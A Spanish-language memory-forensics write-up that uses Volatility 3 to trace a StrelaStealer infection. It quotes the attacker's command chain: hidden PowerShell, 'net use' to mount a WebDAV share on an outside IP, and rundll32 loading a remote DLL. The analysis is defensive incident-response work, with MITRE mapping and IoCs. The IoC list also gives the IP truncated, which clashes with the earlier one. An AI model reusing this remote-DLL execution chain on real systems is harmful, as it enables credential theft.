Tras la Huella de StrelaStealer Análisis Forense de Memoria y Reconstrucción de un Compromiso Mediante PowerShell, WebDAV y Rundll32
Introducción
Cuando se produce un incidente de seguridad, la memoria RAM se convierte en una de las fuentes de evidencia más valiosas para los analistas forenses. A diferencia de otros artefactos del sistema que pueden ser modificados o eliminados por un atacante, la memoria conserva una instantánea del estado real del equipo en el momento del compromiso, permitiendo identificar procesos activos, líneas de comandos, credenciales, conexiones y otros indicadores fundamentales para reconstruir una intrusión.
En este artículo documentaremos la investigación forense realizada sobre una estación de trabajo perteneciente a una entidad financiera que generó múltiples alertas de comportamiento anómalo en los sistemas de monitorización corporativos. Ante la sospecha de una posible intrusión, el equipo de respuesta a incidentes realizó la adquisición de un volcado de memoria RAM con el objetivo de determinar el origen de la actividad maliciosa, identificar los procesos involucrados y evaluar el impacto potencial sobre el entorno afectado.
Mediante técnicas de Memory Forensics utilizando Volatility 3 fue posible identificar una cadena de ataque basada en el uso de herramientas legítimas de Windows, incluyendo PowerShell, Net.exe y Rundll32.exe, utilizadas para acceder a recursos remotos y ejecutar una carga maliciosa alojada en infraestructura controlada por el atacante.
La investigación permitió reconstruir paso a paso la actividad observada en memoria, identificar la ejecución de una DLL maliciosa y atribuir finalmente la actividad a StrelaStealer, una familia de malware especializada en el robo de credenciales de clientes de correo electrónico.
Escenario de la Investigación
El Centro de Operaciones de Seguridad (SOC) detectó actividad sospechosa en un endpoint con acceso a información financiera sensible. Las alertas observadas indicaban la posible ejecución de procesos anómalos y conexiones hacia recursos externos no habituales dentro de la organización.
Ante la posibilidad de una intrusión activa, se procedió a la adquisición de una imagen de memoria RAM para preservar el estado del sistema en el momento del incidente y permitir un análisis forense detallado.
Los objetivos principales de la investigación fueron:
- Identificar el proceso responsable de la actividad maliciosa.
- Reconstruir la cadena de ejecución utilizada por el atacante.
- Determinar el origen de los artefactos observados.
- Identificar recursos remotos utilizados durante el compromiso.
- Determinar el usuario afectado.
- Correlacionar la actividad con MITRE ATT&CK.
- Atribuir la amenaza a una familia de malware conocida.
Metodología
La investigación se desarrolló utilizando Volatility 3 como herramienta principal para el análisis del volcado de memoria.
Durante el proceso se emplearon los siguientes plugins:
windows.info
windows.pslist
windows.psscan
windows.pstree
windows.cmdline
windows.getsids
El análisis se dividió en las siguientes fases:
- Identificación del sistema operativo.
- Enumeración de procesos.
- Análisis de relaciones padre-hijo.
- Revisión de líneas de comando.
- Identificación de artefactos maliciosos.
- Correlación con MITRE ATT&CK.
- Identificación del usuario comprometido.
- Atribución de la amenaza.
Identificación del Sistema Operativo
Antes de comenzar el análisis de procesos es fundamental identificar la versión exacta del sistema operativo. Esta información permite validar la compatibilidad de los plugins utilizados y facilita la interpretación correcta de las estructuras internas del sistema.
Se ejecutó el plugin:
windows.info
Evidencia 1 – Información del sistema
La salida obtenida reveló que el sistema correspondía a:
- Windows 10 x64
- Build 19041
- Version 2004
La identificación correcta del sistema confirmó que el análisis debía realizarse utilizando Volatility 3.
Triage Inicial de Procesos
Una vez identificada la plataforma, el siguiente paso consistió en enumerar los procesos presentes en memoria y detectar posibles anomalías.
Para ello se ejecutaron los plugins:
windows.pslist
windows.psscan
windows.pstreeCada uno proporciona una perspectiva distinta del sistema:
- pslist muestra los procesos activos visibles para Windows.
- psscan permite localizar procesos terminados o potencialmente ocultos.
- pstree reconstruye las relaciones padre-hijo.
Durante esta fase se identificaron varios procesos que merecían una revisión más detallada:
- powershell.exe
- net.exe
- conhost.exe
- wordpad.exe
- thunderbird.exe
La presencia de PowerShell y Net.exe en la misma cadena de ejecución llamó especialmente la atención debido a su frecuente utilización en campañas de malware y actividades post-explotación.
Validación de Procesos del Sistema
Antes de profundizar en los procesos sospechosos, se realizó una revisión de las instancias de svchost.exe presentes en memoria.
Los atacantes suelen utilizar este proceso para ocultar actividad maliciosa debido a la gran cantidad de instancias legítimas que existen en sistemas Windows.
Evidencia 2 – Enumeración de procesos svchost.exe
Evidencia 3 – Relación padre-hijo de servicios
La revisión confirmó que todas las instancias observadas dependían de services.exe, comportamiento completamente legítimo dentro del sistema operativo.
Este hallazgo permitió descartar inicialmente actividad maliciosa asociada a servicios de Windows.
Análisis de Líneas de Comando
La siguiente fase consistió en revisar los argumentos utilizados por los procesos identificados durante el triage.
Para ello se ejecutó:
windows.cmdline
Evidencia 4 – Análisis de líneas de comando
Durante la revisión se identificaron varias líneas de comandos especialmente relevantes:
powershell.exe -windowstyle hiddennet use \\45.9.74.32@8888\davwwwroot\rundll32 \\45.9.74.32@8888\davwwwroot\3435.dllLa secuencia observada resulta especialmente significativa.
Inicialmente se ejecuta PowerShell de forma oculta para evitar la interacción visible con el usuario. Posteriormente se utiliza Net.exe para establecer una conexión hacia un recurso WebDAV remoto y finalmente se emplea Rundll32 para ejecutar una DLL alojada directamente en dicho recurso.
Este patrón es característico de campañas malware que buscan minimizar su presencia en disco y aprovechar herramientas legítimas del sistema operativo para evadir controles de seguridad.
Identificación del Proceso Malicioso
Una vez identificada la actividad sospechosa, se correlacionaron los resultados de pstree y psscan para determinar qué proceso actuaba como punto de origen de la ejecución.
Evidencia 5 – powershell.exe identificado como proceso malicioso
La correlación permitió identificar:
| Campo | Valor |
|---|---|
| Proceso | powershell.exe |
| PID | 3692 |
| PPID | 4120 |
La combinación de este proceso con las líneas de comando observadas anteriormente permitió concluir que PowerShell actuaba como proceso principal dentro de la cadena de ataque.
Ejecución del Payload de Segunda Etapa
Una vez identificado el proceso inicial, el siguiente objetivo fue determinar qué artefacto estaba siendo ejecutado.
Evidencia 6 – Ejecución de DLL remota mediante Rundll32
La línea de comandos observada mostraba la ejecución del archivo:
3435.dlldesde el recurso remoto:
\\45.9.74.32@8888\davwwwroot\Este hallazgo confirmó la existencia de una segunda etapa maliciosa alojada en infraestructura controlada por el atacante.
La utilización de Rundll32 permitió ejecutar la DLL utilizando un binario legítimo de Windows, reduciendo las posibilidades de detección.
Correlación con MITRE ATT&CK
La actividad observada durante la investigación encaja con varias técnicas documentadas por MITRE ATT&CK.
Evidencia 7 – Correlación con MITRE ATT&CK
Las principales técnicas identificadas fueron:
| Técnica | Descripción |
|---|---|
| T1059.001 | PowerShell |
| T1105 | Ingress Tool Transfer |
| T1218.011 | System Binary Proxy Execution: Rundll32 |
| T1106 | Native API |
La técnica más representativa observada durante la investigación fue:
T1218.011 – System Binary Proxy Execution: Rundll32
Esta técnica permite a los atacantes utilizar binarios firmados y legítimos para ejecutar código malicioso, dificultando la detección por parte de herramientas de seguridad.
Identificación del Usuario Comprometido
Determinar el contexto de ejecución es esencial para evaluar el alcance potencial del incidente.
Para ello se utilizó:
windows.getsids --pid 3692
Evidencia 8 – Usuario asociado al proceso malicioso
La salida reveló que el proceso se ejecutaba bajo el usuario:
ElonAdemás, la cuenta pertenecía al grupo local de administradores.
Este hallazgo es especialmente relevante ya que indica que el atacante disponía de privilegios elevados dentro del sistema comprometido.
Identificación del Malware
Una vez identificado el payload utilizado durante el incidente, se realizó una investigación OSINT sobre la muestra observada.
Evidencia 9 – Clasificación del malware
La búsqueda permitió asociar la infraestructura utilizada y el payload ejecutado con la familia:
StrelaStealer
StrelaStealer es una familia de malware especializada en el robo de credenciales almacenadas en clientes de correo electrónico como Microsoft Outlook y Mozilla Thunderbird.
La presencia de múltiples procesos Thunderbird observados durante el análisis refuerza esta hipótesis.
Reconstrucción de la Cadena de Ataque
Tras correlacionar todas las evidencias obtenidas, fue posible reconstruir la secuencia completa del compromiso:
- El atacante ejecuta PowerShell de forma oculta.
- Se establece una conexión hacia un recurso WebDAV remoto.
- Net.exe monta el recurso compartido davwwwroot.
- Rundll32 ejecuta la DLL 3435.dll desde el recurso remoto.
- Se inicia la actividad asociada a StrelaStealer.
- El malware opera bajo una cuenta con privilegios administrativos.
La cadena observada demuestra el uso de técnicas Living Off The Land (LotL), aprovechando herramientas nativas de Windows para reducir la huella operativa del atacante.
Timeline del Ataque
| Hora | Evento |
|---|---|
| 07:00:03 | Ejecución de powershell.exe |
| 07:00:03 | Conexión al recurso WebDAV |
| 07:00:03 | Montaje de davwwwroot mediante Net.exe |
| 07:00:03 | Ejecución de 3435.dll mediante Rundll32 |
| Posterior | Actividad asociada a StrelaStealer |
Indicadores de Compromiso (IoCs)
Dirección IP
45.9.74.3Recurso Compartido
davwwwrootPayload
3435.dll
Proceso Malicioso
powershell.exeUsuario Comprometido
ElonMalware
StrelaStealerConclusiones
El análisis forense de memoria permitió identificar y reconstruir una cadena de compromiso asociada a la familia de malware StrelaStealer. A través de Volatility 3 fue posible determinar que la actividad maliciosa se originó mediante la ejecución de PowerShell, que posteriormente estableció comunicación con un recurso WebDAV remoto para desplegar una segunda etapa ejecutada mediante Rundll32.
La investigación confirmó el uso de técnicas Living Off The Land, aprovechando herramientas legítimas del sistema operativo para minimizar la visibilidad del atacante y dificultar la detección por parte de mecanismos tradicionales de seguridad.
Asimismo, se identificó que la ejecución se produjo bajo una cuenta con privilegios administrativos, aumentando significativamente el impacto potencial del incidente y facilitando posibles actividades posteriores como robo de credenciales, persistencia o movimiento lateral.
La atribución de la muestra a StrelaStealer, junto con la presencia de clientes de correo electrónico en ejecución durante el momento de la captura, sugiere que el objetivo principal de la campaña estaba relacionado con la recopilación y exfiltración de credenciales almacenadas en aplicaciones de correo.
Este caso pone de manifiesto la importancia del análisis de memoria dentro de los procesos de respuesta ante incidentes y demuestra cómo la correlación entre artefactos forenses, Threat Intelligence y MITRE ATT&CK permite reconstruir eficazmente la actividad de un atacante incluso cuando existen pocos indicadores disponibles en disco.
Lecciones Aprendidas
- La memoria RAM puede contener evidencias críticas que no están disponibles en disco.
- PowerShell continúa siendo una de las herramientas más utilizadas por actores maliciosos.
- Rundll32 sigue siendo un LOLBin ampliamente empleado para ejecutar payloads maliciosos.
- La supervisión de conexiones WebDAV puede ayudar a detectar fases tempranas de compromiso.
- La correlación entre DFIR y Threat Intelligence resulta clave para la atribución de amenazas.
- La monitorización de procesos y relaciones padre-hijo sigue siendo una de las técnicas más efectivas para detectar actividad sospechosa en sistemas Windows.
